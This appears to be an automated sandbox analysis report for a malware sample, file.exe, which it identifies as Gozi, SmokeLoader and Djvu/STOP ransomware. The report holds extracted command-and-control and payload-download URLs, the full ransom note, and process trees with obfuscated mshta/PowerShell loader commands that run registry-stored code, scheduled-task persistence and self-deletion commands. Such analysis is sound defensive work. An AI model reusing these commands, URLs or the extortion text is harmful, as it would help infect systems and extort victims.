Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
29/12/2022, 12:31
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20220901-en
General
-
Target
file.exe
-
Size
326KB
-
MD5
99d3d4324e8b60146ed30bfa8b576b6d
-
SHA1
d465a513d381e76b1a2357d86577a2a7e94d7634
-
SHA256
8bae956de62a713c569e032cd73370a58f914232c03cad975c30155adbb2ab89
-
SHA512
24d9bc8467e511d8dd132ac85f285d848776681f9fd435c13b3745903d5c204af093ced778f0c30c5fc960199011c726cbb5a76262931e727446248975541b6b
-
SSDEEP
6144:RUW8LjudGV/OzQ5LSKYf67k13bwZ4Vxq:yLXudGdBSKYy7
Malware Config
Extracted
gozi
Extracted
gozi
22500
confisg.edge.skype.com
http://
s28bxcw.xyz
config.edgse.skype.com
http://89.43.107.7
-
base_path
/recycle/
-
build
250249
-
exe_type
loader
-
extension
.alo
-
server_id
50
Extracted
djvu
http://ex3mall.com/lancer/get.php
-
extension
.isza
-
offline_id
m3KmScxfDyEQzJYP8qjOSfP4FvpsOXlekGuMPzt1
-
payload_url
http://uaery.top/dl/build2.exe
http://ex3mall.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-oWam3yYrSr Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0622JOsie
Extracted
gozi
22500
confisg.edge.skype.com
http://5icvzwz.xyz
http://185.14.45.80
-
base_path
/recycle/
-
build
250249
-
exe_type
worker
-
extension
.alo
-
server_id
50
Signatures
-
Detected Djvu ransomware 10 IoCs
resource yara_rule behavioral2/memory/1564-147-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1564-149-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1564-152-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3920-151-0x00000000022E0000-0x00000000023FB000-memory.dmp family_djvu behavioral2/memory/1564-153-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1564-158-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4700-165-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4700-167-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4700-172-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4700-188-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detects Smokeloader packer 1 IoCs
resource yara_rule behavioral2/memory/2148-133-0x00000000005B0000-0x00000000005B9000-memory.dmp family_smokeloader -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
pid Process 3920 2A4D.exe 1564 2A4D.exe 4468 2A4D.exe 4700 2A4D.exe 2900 build2.exe 4576 build3.exe 860 build2.exe 2988 mstsca.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 2A4D.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 2A4D.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation build2.exe -
Loads dropped DLL 3 IoCs
pid Process 748 regsvr32.exe 860 build2.exe 860 build2.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4084 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\d64db68f-4e22-4dc4-91a7-eb8a726c6f34\\2A4D.exe\" --AutoStart" 2A4D.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 api.2ip.ua 28 api.2ip.ua 43 api.2ip.ua -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 3920 set thread context of 1564 3920 2A4D.exe 89 PID 4468 set thread context of 4700 4468 2A4D.exe 95 PID 2900 set thread context of 860 2900 build2.exe 100 PID 2056 set thread context of 776 2056 powershell.exe 44 PID 776 set thread context of 3508 776 Explorer.EXE 20 PID 776 set thread context of 3796 776 Explorer.EXE 38 PID 776 set thread context of 4764 776 Explorer.EXE 36 PID 776 set thread context of 4600 776 Explorer.EXE 115 PID 4600 set thread context of 3148 4600 cmd.exe 117 PID 776 set thread context of 2248 776 Explorer.EXE 118 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 996 schtasks.exe 2084 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 556 timeout.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3148 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3148 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2148 file.exe 2148 file.exe 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 776 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
pid Process 2148 file.exe 2056 powershell.exe 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 776 Explorer.EXE 4600 cmd.exe 776 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeDebugPrivilege 2056 powershell.exe Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE Token: SeShutdownPrivilege 776 Explorer.EXE Token: SeCreatePagefilePrivilege 776 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 776 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 776 wrote to memory of 4076 776 Explorer.EXE 86 PID 776 wrote to memory of 4076 776 Explorer.EXE 86 PID 4076 wrote to memory of 748 4076 regsvr32.exe 87 PID 4076 wrote to memory of 748 4076 regsvr32.exe 87 PID 4076 wrote to memory of 748 4076 regsvr32.exe 87 PID 776 wrote to memory of 3920 776 Explorer.EXE 88 PID 776 wrote to memory of 3920 776 Explorer.EXE 88 PID 776 wrote to memory of 3920 776 Explorer.EXE 88 PID 3920 wrote to memory of 1564 3920 2A4D.exe 89 PID 3920 wrote to memory of 1564 3920 2A4D.exe 89 PID 3920 wrote to memory of 1564 3920 2A4D.exe 89 PID 3920 wrote to memory of 1564 3920 2A4D.exe 89 PID 3920 wrote to memory of 1564 3920 2A4D.exe 89 PID 3920 wrote to memory of 1564 3920 2A4D.exe 89 PID 3920 wrote to memory of 1564 3920 2A4D.exe 89 PID 3920 wrote to memory of 1564 3920 2A4D.exe 89 PID 3920 wrote to memory of 1564 3920 2A4D.exe 89 PID 3920 wrote to memory of 1564 3920 2A4D.exe 89 PID 1564 wrote to memory of 4084 1564 2A4D.exe 90 PID 1564 wrote to memory of 4084 1564 2A4D.exe 90 PID 1564 wrote to memory of 4084 1564 2A4D.exe 90 PID 1564 wrote to memory of 4468 1564 2A4D.exe 92 PID 1564 wrote to memory of 4468 1564 2A4D.exe 92 PID 1564 wrote to memory of 4468 1564 2A4D.exe 92 PID 4468 wrote to memory of 4700 4468 2A4D.exe 95 PID 4468 wrote to memory of 4700 4468 2A4D.exe 95 PID 4468 wrote to memory of 4700 4468 2A4D.exe 95 PID 4468 wrote to memory of 4700 4468 2A4D.exe 95 PID 4468 wrote to memory of 4700 4468 2A4D.exe 95 PID 4468 wrote to memory of 4700 4468 2A4D.exe 95 PID 4468 wrote to memory of 4700 4468 2A4D.exe 95 PID 4468 wrote to memory of 4700 4468 2A4D.exe 95 PID 4468 wrote to memory of 4700 4468 2A4D.exe 95 PID 4468 wrote to memory of 4700 4468 2A4D.exe 95 PID 4700 wrote to memory of 2900 4700 2A4D.exe 96 PID 4700 wrote to memory of 2900 4700 2A4D.exe 96 PID 4700 wrote to memory of 2900 4700 2A4D.exe 96 PID 4700 wrote to memory of 4576 4700 2A4D.exe 97 PID 4700 wrote to memory of 4576 4700 2A4D.exe 97 PID 4700 wrote to memory of 4576 4700 2A4D.exe 97 PID 4576 wrote to memory of 996 4576 build3.exe 98 PID 4576 wrote to memory of 996 4576 build3.exe 98 PID 4576 wrote to memory of 996 4576 build3.exe 98 PID 2900 wrote to memory of 860 2900 build2.exe 100 PID 2900 wrote to memory of 860 2900 build2.exe 100 PID 2900 wrote to memory of 860 2900 build2.exe 100 PID 2900 wrote to memory of 860 2900 build2.exe 100 PID 2900 wrote to memory of 860 2900 build2.exe 100 PID 2900 wrote to memory of 860 2900 build2.exe 100 PID 2900 wrote to memory of 860 2900 build2.exe 100 PID 2900 wrote to memory of 860 2900 build2.exe 100 PID 2900 wrote to memory of 860 2900 build2.exe 100 PID 860 wrote to memory of 4128 860 build2.exe 101 PID 860 wrote to memory of 4128 860 build2.exe 101 PID 860 wrote to memory of 4128 860 build2.exe 101 PID 4128 wrote to memory of 556 4128 cmd.exe 103 PID 4128 wrote to memory of 556 4128 cmd.exe 103 PID 4128 wrote to memory of 556 4128 cmd.exe 103 PID 2988 wrote to memory of 2084 2988 mstsca.exe 105 PID 2988 wrote to memory of 2084 2988 mstsca.exe 105 PID 2988 wrote to memory of 2084 2988 mstsca.exe 105 PID 776 wrote to memory of 4868 776 Explorer.EXE 108 PID 776 wrote to memory of 4868 776 Explorer.EXE 108 PID 4868 wrote to memory of 2056 4868 mshta.exe 109
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3508
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4764
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3796
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2148
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\271F.dll2⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\271F.dll3⤵
- Loads dropped DLL
PID:748
-
-
-
C:\Users\Admin\AppData\Local\Temp\2A4D.exeC:\Users\Admin\AppData\Local\Temp\2A4D.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Users\Admin\AppData\Local\Temp\2A4D.exeC:\Users\Admin\AppData\Local\Temp\2A4D.exe3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\d64db68f-4e22-4dc4-91a7-eb8a726c6f34" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:4084
-
-
C:\Users\Admin\AppData\Local\Temp\2A4D.exe"C:\Users\Admin\AppData\Local\Temp\2A4D.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\2A4D.exe"C:\Users\Admin\AppData\Local\Temp\2A4D.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Users\Admin\AppData\Local\833db449-6e1d-42ae-bd2c-8de87391678e\build2.exe"C:\Users\Admin\AppData\Local\833db449-6e1d-42ae-bd2c-8de87391678e\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Users\Admin\AppData\Local\833db449-6e1d-42ae-bd2c-8de87391678e\build2.exe"C:\Users\Admin\AppData\Local\833db449-6e1d-42ae-bd2c-8de87391678e\build2.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\833db449-6e1d-42ae-bd2c-8de87391678e\build2.exe" & exit8⤵
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:556
-
-
-
-
-
C:\Users\Admin\AppData\Local\833db449-6e1d-42ae-bd2c-8de87391678e\build3.exe"C:\Users\Admin\AppData\Local\833db449-6e1d-42ae-bd2c-8de87391678e\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:996
-
-
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwdy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwdy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C8075711-8708-3A2C-517C-AB0E15700F22\\\DriverDocument'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gkcjtbkt -value gp; new-alias -name wuksycd -value iex; wuksycd ([System.Text.Encoding]::ASCII.GetString((gkcjtbkt "HKCU:Software\AppDataLow\Software\Microsoft\C8075711-8708-3A2C-517C-AB0E15700F22").ControlJunk))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2056 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g4gb3ytl\g4gb3ytl.cmdline"4⤵PID:4108
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEB45.tmp" "c:\Users\Admin\AppData\Local\Temp\g4gb3ytl\CSC6894266762CD4BF18D4D2AE53B78B25E.TMP"5⤵PID:4188
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a5tib2og\a5tib2og.cmdline"4⤵PID:3132
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECCC.tmp" "c:\Users\Admin\AppData\Local\Temp\a5tib2og\CSC66660A50E7AC4D9E8688996C2EF641A.TMP"5⤵PID:2252
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\271F.dll"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4600 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3148
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:2248
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- Creates scheduled task(s)
PID:2084
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize2KB
MD59d77c9193735a61912ff3bccb47168a7
SHA1aee81c528117867ca69f22f93aa2ca710f908b6e
SHA25679b78c9e1d9c4fb6c08413757fee9d3d2fdb15415f6b8b9cd9c3bd67a235ba95
SHA512c70ae8ed0d68f38b217f4b6ac809050f27f71e6de140712c56ecf7c55896ae518993c55193bc282097580a3f7c869424789aa3c3cc8ecc81c394f8e15c1f77bb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize1KB
MD5727b3211cc6431ef88585369c6d3551b
SHA156ce91da576d5973625a094d93d5f280a4827e97
SHA256b8fbfc272d61dea1f6880ed2a51565be1702f41976a3754e83e0ee31bc283384
SHA5123aa1c7dbed1f3135f110c3a8118e570a500936c54add455a7b41965ee9495186b234a09f166cd5a09fd94dc4affe0153b0b1c652b5c091e86065e3c584cd5b98
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize488B
MD544fee098d049a1090828569872ce2dcc
SHA13e766d98ca513cabe459c4565fbd90978bee63aa
SHA2565ddc46ff1fab4afa4cd21bab4e9b40fadae2b1e1a447441e7903f2d003d4ecc4
SHA5121059ad6fd68d6f88b11d2556d12bcaabca21345ea9e430d654102e4ec85f90a934db618ab427d009f037e5610620fa20427876144c75d8af538b4b81b3289efb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize482B
MD5c26bcfbd1f33a737c7db20efcd7d807c
SHA164ef527673dcb2195ae611253b39020387befe3d
SHA2569c7209babfbefce1c7c36cd870fea02f5e7ecef8a61fdfb271bc93395cd6d9b2
SHA512ba93dc8c6ffb6f96870bfd534e36c18f88cd5c8065902b9b82086826807458b74aeb3702b283bfed9faba0a081d1bc561f6859f6edbd417d42423060c2191722
-
Filesize
409KB
MD5a131064868de7468d2e768211431401b
SHA1381ad582f72b30b4764afe0a817569b384be65a2
SHA256027bcfc4c5b4a06371e94f4a6b5f69cbee5bcad651d91115132844a2c10885a1
SHA51240fc84899d7bed5c49980f984e3c1446dece3861e5e107fa71e1876f4b778aa8369f03422a971d144f8e65f62a109f53ba94e86bc6ddec478d1bc71f3bb29309
-
Filesize
409KB
MD5a131064868de7468d2e768211431401b
SHA1381ad582f72b30b4764afe0a817569b384be65a2
SHA256027bcfc4c5b4a06371e94f4a6b5f69cbee5bcad651d91115132844a2c10885a1
SHA51240fc84899d7bed5c49980f984e3c1446dece3861e5e107fa71e1876f4b778aa8369f03422a971d144f8e65f62a109f53ba94e86bc6ddec478d1bc71f3bb29309
-
Filesize
409KB
MD5a131064868de7468d2e768211431401b
SHA1381ad582f72b30b4764afe0a817569b384be65a2
SHA256027bcfc4c5b4a06371e94f4a6b5f69cbee5bcad651d91115132844a2c10885a1
SHA51240fc84899d7bed5c49980f984e3c1446dece3861e5e107fa71e1876f4b778aa8369f03422a971d144f8e65f62a109f53ba94e86bc6ddec478d1bc71f3bb29309
-
Filesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
Filesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
Filesize
584KB
MD571bb495869bfff145090bdb878800130
SHA15d1e298129bc9c8bf6d1b5d3d9f321a8858e9ab5
SHA2569475ff9c5e05af184d06a10b33225f74e89cb941495a82bf4038df98169a432f
SHA512ef22db3f32bf5cd34bc69245c41e9eea8bff7b61c8062631a0817744155e802c7caf4f2711ff653572a15903fc07b1af283cd2289d75f268c22eec14ae173c73
-
Filesize
584KB
MD571bb495869bfff145090bdb878800130
SHA15d1e298129bc9c8bf6d1b5d3d9f321a8858e9ab5
SHA2569475ff9c5e05af184d06a10b33225f74e89cb941495a82bf4038df98169a432f
SHA512ef22db3f32bf5cd34bc69245c41e9eea8bff7b61c8062631a0817744155e802c7caf4f2711ff653572a15903fc07b1af283cd2289d75f268c22eec14ae173c73
-
Filesize
826KB
MD51f0c02e18c9022bbf820745cb3991518
SHA16b6ce6fcc05cb140971f5e84e33d7ed1734e91e7
SHA25651eeb6af44e5101356644ac8ab7372649738cdc2e0dcdd0678b27061fddfb5f9
SHA51215e72393bf51b266b69df4556f861982c9fa9870c134ce72d7fc228d0a5e967ca29e5f1da0a2cad83959818f547d85c76bcfe27d808d3393428471a8952dac4b
-
Filesize
826KB
MD51f0c02e18c9022bbf820745cb3991518
SHA16b6ce6fcc05cb140971f5e84e33d7ed1734e91e7
SHA25651eeb6af44e5101356644ac8ab7372649738cdc2e0dcdd0678b27061fddfb5f9
SHA51215e72393bf51b266b69df4556f861982c9fa9870c134ce72d7fc228d0a5e967ca29e5f1da0a2cad83959818f547d85c76bcfe27d808d3393428471a8952dac4b
-
Filesize
826KB
MD51f0c02e18c9022bbf820745cb3991518
SHA16b6ce6fcc05cb140971f5e84e33d7ed1734e91e7
SHA25651eeb6af44e5101356644ac8ab7372649738cdc2e0dcdd0678b27061fddfb5f9
SHA51215e72393bf51b266b69df4556f861982c9fa9870c134ce72d7fc228d0a5e967ca29e5f1da0a2cad83959818f547d85c76bcfe27d808d3393428471a8952dac4b
-
Filesize
826KB
MD51f0c02e18c9022bbf820745cb3991518
SHA16b6ce6fcc05cb140971f5e84e33d7ed1734e91e7
SHA25651eeb6af44e5101356644ac8ab7372649738cdc2e0dcdd0678b27061fddfb5f9
SHA51215e72393bf51b266b69df4556f861982c9fa9870c134ce72d7fc228d0a5e967ca29e5f1da0a2cad83959818f547d85c76bcfe27d808d3393428471a8952dac4b
-
Filesize
826KB
MD51f0c02e18c9022bbf820745cb3991518
SHA16b6ce6fcc05cb140971f5e84e33d7ed1734e91e7
SHA25651eeb6af44e5101356644ac8ab7372649738cdc2e0dcdd0678b27061fddfb5f9
